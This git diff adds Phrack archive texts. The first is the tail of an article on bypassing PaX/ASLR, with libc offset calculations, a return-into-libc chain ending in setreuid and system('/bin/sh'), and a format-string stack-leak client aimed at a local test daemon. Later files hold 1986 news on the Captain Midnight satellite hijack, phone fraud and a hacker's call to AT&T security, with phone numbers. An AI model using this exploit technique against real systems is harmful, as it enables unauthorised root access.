+ [4425]    0x750d0     strcpy    type: Function  size: 00032 bytes  => .text
+ [4855]    0x48870     system    type: Function  size: 00730 bytes  => .text
+ [5670]    0xc59b0   setreuid    type: Function  size: 00188 bytes  => .text
+ [6126]    0x2efe0       exit    type: Function  size: 00248 bytes  => .text
+
+ bash$ elfsh -f /lib/libc.so.6 -sym __libc_start_main
+
+ [SYMBOL TABLE]
+ [6218]  0x1d230 __libc_start_main type: Function size: 00193 bytes => .text
+
+ bash$
+
+
+ [d] As the main() function return into __libc_start_main , lets look
+ precisely in the assembly code where main() will return . So, we would
+ know the relative offset between the needed function address and the
+ address of the 'call main' instruction . This code is located in the libc.
+ This dump has been taken from my default SlackWare libc.so.6 for which you
+ may not need to change relative file offsets in the exploit .
+
+ 0001d230 <__libc_start_main>:
+    1d230:       55                      push   %ebp
+    1d231:       89 e5                   mov    %esp,%ebp
+    1d233:       83 ec 0c                sub    $0xc,%esp
+    (...)
+    1d2e6:       8b 55 08                mov    0x8(%ebp),%edx
+    1d2e9:       ff d2                   call   *%edx
+    1d2eb:       50                      push   %eax
+    1d2ec:       e8 9f f9 ff ff          call   1cc90 <GLIBC_2.0+0x1cc90>
+    (...)
+
+ Instructions following this last 'call 1cc90' are 'nop nop nop nop', just
+ headed by the 'Letext' symbol, but thats not interresting for us .
+
+ Because the libc might have been recompiled, it may be possible
+ to have different relative offsets for your own libc built and it
+ would be very difficult to guess absolute addresses just using the
+ main() return address in this case. Of course, if we have a
+ binary copy of the used library (like a .deb or .rpm libc package), we
+ can predict these offsets without any problem . Let's look at the
+ offsets for my libc version, for which the exploit is based .
+
+ We know from the 'bt' output (see above) that the main address is the
+ first __libc_start_main() parameter . Since this function has a frame
+ pointer, we deduce that 8(%ebp) contains the main() absolute address .
+ The __libc_start_main function clearly does an indirect call through
+ %edx on it (see the last 3 instructions) :
+
+    1d2e6:       8b 55 08                mov    0x8(%ebp),%edx
+    1d2e9:       ff d2                   call   *%edx
+
+ We deduce that the return address we read in the process stack points
+ on the intruction at file offset 1d2eb :
+
+    1d2eb:       50                      push   %eax
+
+ We can now calculate the absolute address we are looking for :
+
+     . main() ret-addr : file offset 0x1d2eb, virtual address 0x4003e2eb
+     . system()        : file offset 0x48870, virtual address unknown
+     . setreuid()      : file offset 0xc59b0, virtual address unknown
+     . exit()	       : file offset 0x2efe0, virtual address unknown
+     . strcpy()	       : file offset 0x750d0, virtual address unknown
+
+ What we deduce from this :
+
+     . system() addr	= main ret + (system offset - main ret offset)
+			= 4003e2eb + (48870 - 1d2eb)
+			= 4003e2eb + 2B585
+			= 40069870
+
+     . setreuid() addr  = main ret + (setreuid offset - main ret offset)
+			= 4003e2eb + (c59b0 - 1d2eb)
+			= 4003e2eb + a86c5
+			= 400e69b0
+
+     . exit() addr	= main ret + (exit offset - main ret offset)
+			= 4003e2eb + (2efe0 - 1d2eb)
+			= 4003e2eb + 11cf5
+			= 4004ffe0
+
+     . strcpy() addr	= 4003e2eb + (750d0 - 1d2eb)
+			= 4003e2eb + 57de5
+			= 400960d0
+
+ We needs some more offsets to perform a chained return into libc and
+ insert NUL bytes as explained in Nergal's paper :
+
+     - A pointer on the setreuid() parameter reposing on the stack, to be
+     used as a dst strcpy parameter (we need to nullify it) :
+
+     do_auth fp + 28 = B5C36CC8 + 1C
+		     = B5C36CE4
+
+ The setreuid parameter address (reposing on the stack) can be found
+ using the do_auth() frame pointer value (B5C36CC8 in the stack dump), or
+ if there is no frame pointer, using whatever stack variable address
+ we can guess .
+
+     - A pointer on a NUL byte to be used as a src strcpy parameter (let's
+     use the "/bin/sh" final byte address)
+
+     main ret addr + (string offset - main ret offset) + strlen("/bin/sh")
+		       = 4003e2eb + (fcc19 - 1d2eb) + 7
+		       = 4003e2eb + df92e + 7
+		       = 4011dc19 + 7
+		       = 4011dc20
+
+     - A "/bin/sh" string with predictable absolute address for the
+     system() parameter (we will find one in the libc's .rodata section
+     which is part of the same zone (has the same base address) than
+     libc's .text)
+
+		    main ret addr + (string offset - main ret offset)
+		       = 4003e2eb + (fcc19 - 1d2eb)
+		       = 4003e2eb + df92e
+		       = 4011dc19
+
+ bash$ elfsh -f /lib/libc.so.6 -X '.rodata' | grep -A 1 '/bin/'
+
+ nbits.333 + 152             0xfcc18 :   00 2F 62 69  6E 2F 73 68   ./bin/sh
+ nbits.333 + 160             0xfcc20 :   00 00 00 00  00 00 00 00   ........
+ --
+    zeroes + 19              0xff848 :   73 68 00 2F  62 69 6E 2F   sh./bin/
+    zeroes + 27              0xff850 :   73 68 00 00  00 00 00 00   sh......
+ --
+    zeroes + 560             0xffad0 :   68 00 2F 62  69 6E 2F 73   h./bin/s
+    zeroes + 568             0xffad8 :   68 00 74 6D  70 66 00 77   h.tmpf.w
+
+ bash$
+
+
+     - A 'pop ret' and 'pop pop ret' sequences somewhere in the code, in
+     order to do %esp lifting (we will find many ones in libc's .text)
+
+ For 'pop ret' sequence :
+
+ bash$ objdump -d --section='.text' /lib/libc.so.6 | grep ret -B 1 | \
+ grep pop -A 1
+
+ (...)
+   2c519:       5a                      pop    %edx
+   2c51a:       c3                      ret
+ (...)
+
+ For 'pop pop ret' sequence :
+
+ bash$ objdump -d --section='.text' /lib/libc.so.6 | grep ret -B 3 | \
+ grep pop -A 3 | grep -v leave
+
+ (...)
+   4ce25:       5e                      pop    %esi
+   4ce26:       5f                      pop    %edi
+   4ce27:       c3                      ret
+ (...)
+
+ Note: be careful and check if the addresses are contiguous for the
+ 3 intructions because the regex I use it not perfect for this last
+ test .
+
+ Here is how you have to fill the stack in the final overflow (each case is
+ 4 bytes lenght, the first dword is the return address of the vulnerable
+ function) :
+
+ 0:  | strcpy   addr | 'pop; pop; ret' addr | strcpy argv1 | strcpy argv2 |
+ 16: | strcpy   addr | 'pop; pop; ret' addr | strcpy argv1 | strcpy argv2 |
+ 32: | strcpy   addr | 'pop; pop; ret' addr | strcpy argv1 | strcpy argv2 |
+ 48: | strcpy   addr | 'pop; pop; ret' addr | strcpy argv1 | strcpy argv2 |
+ 64: | setreuid addr | 'pop; ret'      addr |setreuid argv1| system addr  |
+ 80: | exit     addr | "/bin/sh"       addr | ??? DONT ??? | ??? CARE ??? |
+
+ We need to overflow at least 84 bytes after the original return address .
+ This is not a problem . The 4 first return-into-strcpy are used to nullify
+ the setreuid argument, which has to be a 0x00000000 dword .
+
+
+
+
+-------[ 4. Exploitation conditions
+
+
+   The attack suffers from many known limitations as you will see .
+
+
+   [a] Looking for exploitable stack based overflows
+
+
+ Not all overflows can be exploited like this . memcpy() and strncpy()
+ overflows are vulnerable, so as byte-per-byte overflows . Overflow
+ involving functions whoose behavior is to append a NUL byte are not
+ vulnerable, except if we can find a 'call printf' instruction
+ whoose absolute address low byte is NUL .
+
+
+   [b] Looking for leak functions
+
+
+ We can use printf() to leak information about the address space .
+ We can also return into send() or write() and take advantage of 
+ the very good error handling code :
+
+ We will not crash the process if we try to read some unmapped process 
+ area . From the send(3) manual page :
+
+ ERRORS
+   (...)
+       EBADF  An invalid descriptor was specified.
+
+       ENOTSOCK The argument s is not a socket.
+
+       EFAULT An invalid user space address was specified for a parameter.
+   (...)
+
+
+ We may want to return-into-write or return-into-any_output_function if
+ there is no printf and no send somewhere near the original return
+ address, but depending on the output function, it would be quite hard 
+ to perform the attack since we would have to control many of the vulnerable 
+ function parameters .
+
+
+   [c] The frame pointer problem and workaround
+
+
+ The technique also suffers from the same limitation than klog's fp
+ overwriting [7] .
+
+ If the frame pointer register (%ebp) is used between the 'call printf' and
+ the 'call vuln_func', the program will crash and we wont be able
+ to call vuln_func() again . Programs like:
+
+ /* Non-buggy passwd based authentication */
+ int		do_auth()
+ {
+   int len;
+
+   printf("Password: ");
+   fflush(stdout);
+   len = read(0, pass, sizeof(pass) - 1);
+   if (len <= 0)
+     FATAL("read");
+   pass[len] = 0;
+   if (!verify(pass))
+ (...)
+
+ are not exploitable using a return into libc because 'len' will be indexed
+ through %ebp after the read() returns . If the program is compiled without
+ frame pointer, such a limitation does not exist .
+
+
+   [d] Discussion about segvguard
+
+
+ Segvguard is a tool coded by Nergal described in his paper [3] . In
+ short, this tool can be used to forbid the executable relaunching if it
+ crashed too much times . If segvguard is used, we are definitely asked
+ to find the output function in the very near (+- 256 bytes) or the original
+ return address . If segvguard is not used, we can try a two byte EIP
+ overflow and brute force the 4 randomized bits in the high part of the
+ second overflowed byte . This way, we'll be able to return on a farer
+ 'call printf' instruction, increasing our chances .
+
+
+
+-------[ 5. The code : DHagainstpax
+
+
+ I would like to sincerely congratulate the PaX team because they own me
+ (who's the ingratefull pig ? ;) and because they've done the best work I
+ have ever seen in this field since Openwall . Thanks go to theowl, klog,
+ MaXX, Nergal, kalou and korty for discussions we had on this issue .
+ Special thanks go to devhell labs 0 : - ] Shoutouts to #fr people (dont
+ feed the troll) . May you all guyz pray for peace .
+
+<++> DHagainstpax/leak.c !78040134
+
+ /*
+ *
+ * Info leak code against PaX + ASLR protection .
+ *
+ */
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <string.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+#include <arpa/inet.h>
+#include <signal.h>
+
+#define	FATAL(str) { perror(str); exit(-1); }
+
+#define	PORT_NUM		666
+#define	SERVER_IP		"127.0.0.1"
+
+#define	BUF_SIZ			37
+#define	FMT			"%%%03u$08u                            \x9a"
+#define	RETREIVED_STACKSIZE	20
+
+
+u_int			remote_stack[RETREIVED_STACKSIZE];
+
+
+void			sigint_handler(int sig)
+{
+  printf("Starting remote stack retreiving ... ");
+}
+
+int			main(int argc, char **argv)
+{
+  char			buff[256];
+  struct sockaddr_in	addr;
+  int			sock;
+  int			len;
+  u_int			cnt;
+  u_char		fmt[BUF_SIZ + 1];
+
+  if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
+    FATAL("socket");
+
+  bzero(&addr, sizeof(addr));
+  addr.sin_family = AF_INET;
+  addr.sin_port = htons(PORT_NUM);
+  addr.sin_addr.s_addr = inet_addr(SERVER_IP);
+
+  if (connect(sock, (struct sockaddr *) &addr, sizeof(addr)) < 0)
+    FATAL("connect");
+
+  len = read(sock, buff, sizeof(buff) - 1);
+  buff[len] = 0;
+  printf("[RECEIVED FROM SERVER] *%s* \n", buff);
+
+  signal(SIGINT, sigint_handler);
+  printf("Connected! Press ^C to launch : ");
+  fflush(stdout);
+  pause();
+
+  for (cnt = 0; cnt < RETREIVED_STACKSIZE; cnt++)
+    {
+      snprintf(fmt, sizeof(fmt), FMT, cnt);
+      write(sock, fmt, BUF_SIZ);
+      len = read(sock, buff, sizeof(buff) - 1);
+      buff[len] = 0;
+      sscanf(buff, "%u", remote_stack + cnt);
+    }
+
+  printf("\n\nRemote stack : \n");
+  for (cnt = 0; cnt < RETREIVED_STACKSIZE; cnt += 4)
+    printf("%08X %08X %08X %08X \n",
+	   remote_stack[cnt], remote_stack[cnt + 1],
+	   remote_stack[cnt + 2], remote_stack[cnt + 3]);
+  puts("");
+
+  return (0);
+}
+
+<-->
+
+<++> DHagainstpax/Makefile !d055b5f3
+##
+## Makefile for DHagainstpax
+##
+
+SRC1	= pax_daemon.c
+OBJ1	= pax_daemon.o
+NAM1	= paxtestd
+SRC2	= leak.c
+OBJ2	= leak.o
+NAM2	= runit
+CC	= gcc
+CFLAGS	= -Wall -g3 #-fomit-frame-pointer
+OPT	= $(CFLAGS)
+DUMP 	= objdump -d --section='.text'
+DUMP2	= objdump --syms
+GREP	= grep
+DUMPLOG	= $(NAM1).asm
+CHPAX	= chpax -X
+
+all	: fclean leak vuln
+
+vuln	: $(OBJ1)
+	$(CC) $(OPT) $(OBJ1) -o $(NAM1)
+	@echo ""
+	$(CHPAX) $(NAM1)
+	$(DUMP) $(NAM1) > $(DUMPLOG)
+	@echo ""
+	@echo "Try to locate 'call printf' ;) 5th call above 'call verify'"
+	@echo ""
+	$(GREP) "_init\|verify" $(DUMPLOG) | $(GREP) 'call'
+	@echo ""
+	$(DUMP2) $(NAM1) | grep printf
+	@echo ""
+
+leak	: $(OBJ2)
+	$(CC) $(OPT) $(OBJ2) -o $(NAM2)
+
+clean	:
+	rm -f *.o *\# \#* *~
+
+fclean	: clean
+	rm -f $(NAM1) $(NAM2)
+<-->
+
+
+-------[ 6. References
+
+ [1] PaX homepage					The PaX team
+     http://pageexec.virtualave.net
+
+ [2] The OpenWall project				Solar Designer
+     http://openwall.com/linux/
+
+ [3] Advanced return-into-lib(c) exploits		Nergal
+     http://phrack.org/show.php?p=58&a=4
+
+ [4] Pentium refefence manual 'system programming guide'
+     http://developer.intel.com/design/Pentium4/manuals/
+
+ [5] Bypassing stackguard and stackshield		Kil3r/Bulba
+     http://phrack.org/show.php?p=56&a=5
+
+ [6] Writing alphanumeric shellcodes			rix
+     http://phrack.org/show.php?p=57&a=15
+
+ [7] Frame pointer overwriting				klog
+     http://phrack.org/show.php?p=55&a=8
+
+ [8] Exploiting format bugs				scut
+     http://team-teso.net/articles/formatstring/
+
+ [9] The ELFsh project					devhell labs
+     http://www.devhell.org/~mayhem/projects/elfsh/
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack6/1.txt b/phrack6/1.txt
new file mode 100644
index 0000000..bbc06bd
--- /dev/null
+++ b/phrack6/1.txt
@@ -0,0 +1,35 @@
+                                ==Phrack Inc.==
+
+                     Volume One, Issue Six, Phile 1 of 13
+
+Introduction
+------------
+    Welcome to Phrack Inc. VI!  We have been somewhat delayed in our release
+due to problems with my home life (see PWN in this issue for details) but here
+we go!  Right now, Metal Shop Private is down, but when I return to real life,
+it should re-emerge with a new BBS program and hopefully will be better than
+ever.  Now, with the release of Telecomputist Newsletter, we have the
+capabilities to have Phrack Inc. printed out.
+    If you feel you'd like to subscribe to something like this, it would be
+operated in this manner: being one of our positive points, it will be free to
+an extent.  You, the subscriber, will be paying for postage and if necessary,
+envelopes as well as P.O. Box rental, but none of this should amount to much.
+If you are interested in getting this, please contact any member of the Metal
+Shop Family or Phantom Phreaker of The Alliance with your opinions on this.  If
+we get enough support, we'll get this rolling.  Later on.
+
+                                          TARAN KING
+                                 Sysop of Metal Shop Private
+
+This issue of Phrack Inc. includes the following philes:
+      Title by Author (amount in K)
+
+1    Index by Taran King (1k)
+2    Pro-Phile on Groups by Knight Lightning (14k)
+3    The Technical Revolution by Dr. Crash (4k)
+4    Fun with Lighters by The Leftist (2k)
+5    Nasty Unix Tricks by Shooting Shark (4k)
+6    Smoke Bombs by Alpine Kracker (2k)
+7    Cellular Telephones by High Evolutionary (5k)
+8    Wide Area Networks by Jester Sluggo (10k)
+9-13 Phrack World News by Knight Lightning (16,15,15,16,15K)
diff --git a/phrack6/10.txt b/phrack6/10.txt
new file mode 100644
index 0000000..911dc6f
--- /dev/null
+++ b/phrack6/10.txt
@@ -0,0 +1,310 @@
+                                ==Phrack Inc.==
+
+                    Volume One, Issue Six, Phile 10 of 13
+
+\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\
+
+                         *-=+^ Phrack World News ^+=-*
+
+                               Issue Five/Part 2
+
+                            Compiled and Written By
+
+                               Knight Lightning
+
+\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\
+
+Captain Midnight's Sneak Attack                                    May 12, 1986
+-------------------------------
+               "A daring intruder airs the beefs of dish owners"
+
+In the old days, people with complaints against the media had few recourses:
+A stern letter to the editor, perhaps, or a protesting phone call.  "Captain
+Midnight," an outraged consumer of the space age, took more daring action.  In
+a sneak attack made on Sunday of last week, the self-appointed video avenger
+broke into an HBO presentation of the movie "The Falcon and the Snowman" with a
+cryptic message:
+
+                               Good evening HBO
+                             From Captain Midnight
+                            $12.95/Month?   No Way!
+                      (Showtime/The Movie Channel Beware)
+
+The mysterious dispatch, seen for several minutes in the East and Midwest by
+hundreds of thousands of subscribers to the pay-cable service, was clearly
+intended as a rallying cry for the more than 1.5 million owners of home
+satellite dishes in the U.S.  These video free-lancers are angry because many
+of the TV signals they have been plucking from the sky are done by one tuning
+into jumble.  In January, HBO and Cinemax (both owned by Time Inc.) became the
+first two cable services to scramble their signals, thus preventing dish owners
+from watching them without paying a monthly subscription fee.  Showtime and the
+Movie Channel will begin similar scrambling on May 27, and most other
+satellite-beamed cable channels, including ESPN, MTV, the Disney Channel, Cable
+News Network and Superstation WTBS, will follow suit before the end of the
+year.  Their actions have set off a heated battle over just who has the right
+to TV signals bouncing through the skies.
+
+In one blow, Captain Midnight has become a folk hero in that struggle, though
+his identity remains a mystery.  Ordinary home dishes are able only to receive
+signals, not to send them; thus experts think the pirate signal probably came
+from a TV station or other commercial facility.  Wherever the stunt
+originated, TV executives were not amused.  HBO has lodged a complaint with the
+FCC, threatened to prosecute the pirate, and made technical adjustments that it
+claims will prevent any repeat attack.
+
+"He probably thinks this was a prank," says HBO Vice President Dave Pritchard.
+"But the fact is someone has interfered with authorized satellite
+transmissions." The incident has raised concerns that other satellite-borne
+communications, including sensitive data transmitted by business and the
+military, could be similarly disrupted.  Representatives of the three broadcast
+networks insist that a 'hacker' would have difficulty breaking into their
+programming.  But any satellite signal could theoretically be disrupted,
+experts say "Most satellites are built with some safety measures," explains
+Karl Savatiel, director of satellite communications for AT&T.  "But all
+satellites, including military satellites, are vulnerable if a person knows
+where the satellite is located, the frequency it uses for satellite
+transmissions, and the sender's code."
+
+            (This wasn't the full article, just the important part)
+
+                     Taken from Time Magazine May 12, 1986
+        Reported by Jim Byers/Los Angeles and Jerome Cramer/Washington.
+
+                      Typed for PWN's usage by The Seker
+_______________________________________________________________________________
+
+News On Captain Midnight                                         April 28, 1986
+------------------------
+             "Search for Cable TV Prankster Leads to North Texas"
+
+The search for Captain Midnight, the disgruntled video prankster who briefly
+commandeered Home Box Office's satellite transmissions over the eastern
+two-thirds of the country early Sunday, has led federal investigators to North
+Texas, a Justice Department official said Monday.
+
+John K. Russell, a Justice Department spokesman in Washington, told
+Knight-Ridder Newspapers that "the perpetrator is believed to be in North
+Texas."  Later he said the search was in Texas "as well as other areas."
+
+Other authorities told Knight-Ridder that investigators in the Dallas field
+offices of the FBI and the Federal Communications Commission (FCC) have been
+focusing on a tip that Sunday's four-minute cable interruption originated in
+North Texas.
+
+FBI and FCC officials in Dallas could not be reached for comment Monday.
+
+Captain Midnight interrupted a movie broadcast Sunday with a message protesting
+new fees being charged the owners of satellite dishes for access to HBO.  The
+five line message, superimposed on a test pattern, said:
+
+                   "Good evening HBO from Captain Midnight.
+                           $12.95 a month?  No way!
+                       (Showtime-Movie Channel Beware.)"
+
+In January, HBO began scrambling its broadcasts to prevent owners of satellite
+dishes from unauthorized interception of the signal as it bounced from a
+satellite to cable television systems.
+
+HBO told dish owners that they would have to buy a descrambler for $395 and
+pay $12.95 a month.
+
+"While the man on the street may have once thought that Captain Midnight's
+message was limited to being a prank, it does represent a very serious threat
+to any company or entity using satellites to transmit information," said Alan
+Levi, HBO's manager of corporate public relations.
+-------------------------------------------------------------------------------
+Other:
+
+Alan Levi:             [212] 512-1659 (Cooperate affairs)
+David Pritchard:       [212] 512-1413 (Cooperate affairs)
+Tim Larker:            [212] 512-5666 (Network scrambler assistant)
+New York City FCC:     [212] 620-3438 (Federal Communications Commission)
+HBO Cooperate Offices: [212] 512-1000
+-------------------------------------------------------------------------------
+David Lightman:
+
+I have spoken with several people about 'Captain Midnight'.  I have spoken to
+everyone above.  This David Pritchard tried to tell me this:
+
+DP = David Pritchard
+DL = David Lightman
+-------------------------------------------------------------------------------
+DL:  Where do you think this 'Captain Midnight' is?
+
+DP:  Would assume he is in the North Texas region.  Possibly 214.
+
+DL:  What makes you think this?
+
+DP:  We believe this is true due to a tip from a Dallas resident.
+
+DL:  How do you know that he was not lying to lead you away from the real
+     Captain Midnight?
+
+DP:  I know he was probably not lying because he left us his mailbox number.
+
+DL:  Which is?
+
+DP:  I cannot release that information right now.
+
+      (This conversation went on for a while. Possibly 10-15 minutes...)
+-------------------------------------------------------------------------------
+David Lightman earlier had spoken with Alan Levi...
+-------------------------------------------------------------------------------
+DL:  Yes.  Do you have any idea who this Captain Midnight might be?
+
+Alan:  No, but we are fairly certain it is someone in the 212 area with access
+       to the scrambling offices of HBO.  The knowledge necessary for what
+       this guy did could not be gotten very easily without getting it from our
+       departments.
+
+DL:  Well, I believe I know who this Captain Midnight is.
+
+Alan:  Could you please tell me who you think Captain Midnight is?
+
+DL:  No.  If it is the person I suspect, I would rather not cause any trouble
+     for them.
+
+Alan:  You wouldn't cause much trouble for him.
+
+DL:  Isn't what this guy did a federal offense?
+
+Alan:  Well, yes it is, but you would be surprised how many people get away
+       with breaking federal laws.
+
+                         (He actually said that guys!)
+
+DL:  Hmm....  What would happen to him?
+
+Alan:  We would just let him know that what he did was not a prank.  It was
+       very serious.  It could possibly change the entire industry and unless
+       he stops transmitting over our satellites, we will ask the Department of
+       Defense to handle it from then on.
+
+DL:  Well, I would need to think about it a little more.  Can I call you back a
+     little later?
+
+Alan:  Could you just give me your number and I will have David Pritchard call
+       you back?
+
+DL:  It depends on who else will get my number.
+
+Alan:  Just me.  I will consider this conversation and all of the conversations
+       that follow to be an anonymous tip.
+
+DL:  Sure then.  It is (214) 733-5162.
+
+Alan:  Thanks.  Then I will have David call you if you do not call me back
+       before tomorrow evening.
+
+DL:  That would be fine.  Thanks.
+
+Alan:  Thank you.
+------------------------------End of Conversation------------------------------
+Well as you may have guessed, my number (mailbox) was given to the FCC, FBI,
+and David Pritchard as well as Tim Larker.  I got pretty pissed so I called
+David Pritchard.  That was the first conversation I posted.  We (Alan Levi,
+David Pritchard, Tim Larker, the FCC, the FBI, Knight-Ridder Newspapers, and I)
+now have the country believing that the transmission originated in Dallas.  Of
+course it did, but you may see that changed soon.  I plan on another
+conversation with these intelligent people tomorrow 5:00 PM.
+
+If you do call these guys, please do not mention the Administration, Team
+Hackers'86, any member of either group or me to them as being the transmitter.
+You have no proof at all about that.  I did not say if we were involved or not.
+That will be left up to your imagination.
+
+             Information and Interviews Provided by David Lightman
+_______________________________________________________________________________
+
+Captain Midnight Busted!                                           June 6, 1986
+------------------------
+Captain Midnight probably isn't sleeping too well these days.  His name, still
+publicly unannounced, is probably known by many, including the FBI.  He has
+already been reported to have been fired from his job at an uplink facility, of
+which there are only around 100 in this country.  The facility is east of the
+Rockies and does not operate after midnight.  Also, a newer type of equipment
+was used of which there are only a few in the country.  We expect charges to be
+filed any day now, possibly just in time for the June 12th congressional
+hearings on signal jamming.  Penalties could include a one year jail sentence
+and up to $50,000 in fines; $10,000 maximum of which would be for jamming only.
+
+We expect FM America to come to Captain Midnight's rescue financially by
+raising defense money.  All segments of the TVRO industry condemned the signal
+jamming.  It is interesting to note the grins and smiles while discussing the
+subject, however, FM America knows who "Captain Midnight" is and even
+interviewed him live on the air on "FM America."  Tapes of FM America including
+Captain Midnight's interview have been turned over to federal investigators.
+
+Several benefits can be realized by Captain Midnight's signal "interruption."
+Mainly, the fact is now known by everyone that it can be done.  There are no
+secrets either in that a transponder can easily be confused into locking onto
+another signal and ignoring the correct signal as interference.  Also, the
+signal that controls the satellite's positioning could also be accessed.  The
+overall possibility that our entire "satellite system" in general can be
+rendered ineffective from the ground is kind of unnerving.
+
+Signal scrambling did not interfere with the HBO signal lockout because a
+higher wattage beam over-powered it.  The networks all use pretty powerful
+beams which are used 24 hours-a-day so they would be harder to jam.  If we had
+to guess which uplink was used to jam HBO, we would pick one that was already
+locked into the same satellite, such as one of the superstations. (Hint, Hint!)
+
+                     Information provided by Handsomest One
+_______________________________________________________________________________
+
+Who is Ralph Meola?                                                May 20, 1986
+-------------------
+Ralph Meola is the Head of AT&T Security in New Jersey and theoretically
+everywhere else as well.  He is known to have a computer file on hackers and
+phreaks, and an investigative team, that rivals John Maxfield's "BoardScan".
+
+How did Meola enter into the public eye?  Well, we at Phrack really aren't
+completely sure but, the general idea is that a friend of Sigmund Fraud (See
+TelePub'86 in PWN issue III), using social engineering in order to gain
+information from AT&T, somehow came into contact with Ralph Meola.
+
+Later, Sigmund Fraud was also brought into this and decided to give Ralph Meola
+a call himself.  With Gin Fizz on Sigmund's 3-Way, he got Meola on the phone
+and said,"Hey! This is Sigmund Fraud!"  Typing sounds could be heard in the
+background and in a few seconds Meola responded with Sigmund Fraud's real name,
+address, phone numbers, and the names of several BBSes that he was on.
+
+Meola then insisted that Sigmund Fraud give him his account on Stronghold East
+or at the very least, all of the newuser logon procedures and passwords.
+Failure to do so would mean big trouble for Sigmund Fraud.  Sigmund of course
+gave Meola the always nice "fuck you!" and hung up on Meola.
+
+Although Sigmund Fraud was (at the time) on Metal Shop Private, Meola didn't
+know it, or at least he didn't mention it as a BBS that Sigmund was on.  This
+means that Meola has no agents on Metal Shop Private.  It is also known that
+Meola has no agents on Stronghold East.  Otherwise he wouldn't have needed the
+password information from Sigmund.  It is believed that Meola was on Stronghold
+East before the MASSIVE purge several months ago.
+
+          Information Provided by Sigmund Fraud/Gin Fizz/Slave Driver
+                  The assumptions and theories are my own -KL
+-------------------------------------------------------------------------------
+Slave Driver has since sent Ralph Meola the following letter:
+-------------------------------------------------------------------------------
+TO:  Ralph Meeola
+     Head AT&T Security
+
+From: Slave Driver
+
+Re: My user.
+
+   Hello.  I find it rather hard to get in touch with you through normal
+means, but give me some time.
+
+   I was told you have been threatening my users, trying to get access here.
+That is not good.  Ralph, if you want access just ask for it, don't go
+threatening my users.  That was not an intelligent idea, Ralph.
+
+   If you are such a big guy [in your mind, and uh, hand] why not give me a
+call.  I'm sure you have my number.  I would be very interested in talking to
+you.  So, you decide, Ralph.  Either way, we'll talk one day.
+
+                       Bye Ralph,
+
+                       Slave Driver
+_______________________________________________________________________________
diff --git a/phrack6/11.txt b/phrack6/11.txt
new file mode 100644
index 0000000..b7cf117
--- /dev/null
+++ b/phrack6/11.txt
@@ -0,0 +1,285 @@
+                                ==Phrack Inc.==
+
+                    Volume One, Issue Six, Phile 11 of 13
+
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+                         *-=+^ Phrack World News ^+=-*
+
+                               Issue Five/Part 3
+
+                            Compiled and Written By
+
+                               Knight Lightning
+
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+Cracking Down On Abuse
+----------------------
+This article is from the January issue of MCI World, a monthly newsletter
+published by MCI for it's employees.
+-------------------------------------------------------------------------------
+The nationwide attack on telephone fraud got a boost recently when the U.S.
+Secret Service joined the effort to curb the crime that costs the industry
+millions in lost revenue annually.
+
+The Secret Service used new jurisdiction over the telephone fraud for the first
+time to arrest five individuals in raids on four illegal "Call-Sell" operations
+in New York City last November.
+
+The five suspects are awaiting trial in federal court on charges based on a
+Secret Service investigation conducted in cooperation with MCI and other
+members of the long distance telephone industry.
+
+The defendants were charged with violation of a law on Fraud In Connection With
+Access Devices which carries maximum penalties of 15 years imprisonment and a
+fine of $50,000, or twice the value of the fraudulent activity.
+
+Several other investigations are under way and future arrests are expected,
+according to a Secret Service spokesman.
+
+MCI cooperated in the investigation as a company and through membership in the
+Communications Fraud Control Association (CFCA), made up of some 35 telephone
+industry firms.
+
+"Because it's an industry-wide problem, we have organized to crack down on all
+kinds of fraud, from the isolated 'hacker' to more organized schemes to use
+long distance lines illegally," said Everick Bowens, senior manager of MCI
+security investigations and president of CFCA.
+
+The Secret Service said that in the New York cases, the defendants operated
+Call-Sell businesses out of their homes and charged "customers" a flat fee for
+making long distance calls.  They used "Blue Boxes" and stolen or compromised
+authorization codes or credit card numbers to use the long-distance networks
+of several companies.
+
+Blue Boxes are electronic tone-generating devices used to bypass billing
+systems and gain access to company networks.  They can be assembled from
+generally available electronic parts or they can be purchased ready-made
+through illegal sources.
+
+In the New York raids, agents seized unauthorized cods and credit card numbers,
+four Blue Boxes and more than 20 telephones.
+
+It is estimated that in 1984, fraud in the telecommunications industry totaled
+$500 million nationwide, and approximately $70 million in the New York City
+area.
+
+CFCA members are primarily inter-exchange carriers, such as MCI, but resale
+carriers and some Bell Operating Companies (BOCs) are also members, along with
+representatives of computer services and credit card companies.
+
+Bowens says CFCA is intensifying efforts to stop the spread of fraud.  Among
+other things, CFCA is developing educational packages for carriers and the
+public to promote widespread understanding of telephone fraud and ways to
+counter the crime.
+
+"Our aim is jointly to prevent, detect, investigate and prosecute any
+fraudulent use of our long-distance networks," Bowens said.
+
+Authorization codes are obtained by theft from individuals and by "hackers" who
+randomly try combinations of numbers by telephone or through computer scanning
+of number combinations until a working code is "hit."  Illegally obtained codes
+are fraudulently used by "boiler room" telemarketing operations, for example,
+or are passed along for use by individuals.
+
+MCI had developed software to detect illegal entry into its network and it is
+expected that the spread of dial 1 service, in which authorization codes are
+not used, will help reduce the incidence of telephone fraud.
+-------------------------------------------------------------------------------
+Comments from the Bootleg:
+
+You reckon they mean us???????????????
+
+What's wrong with them, can't they take a joke???????????
+_______________________________________________________________________________
+
+The Many Faces Of Fraud
+-----------------------
+The following is an article from the January issue of MCI World, a monthly
+newsletter published by MCI for it's employees.
+-------------------------------------------------------------------------------
+This new year will see a stepped up MCI attack on telephone fraud--illegal use
+of the long distance network through access by stolen authorization codes or
+electronic devices.  The offensive is led by Everick Bowens, senior manager of
+MCI's security investigations department and president of the industry-wide
+Communications Fraud Control Association (CFCA).  Success in curbing this theft
+of service has earned MCI security investigators a reputation as super sleuths
+at headquarters and in the divisions.
+
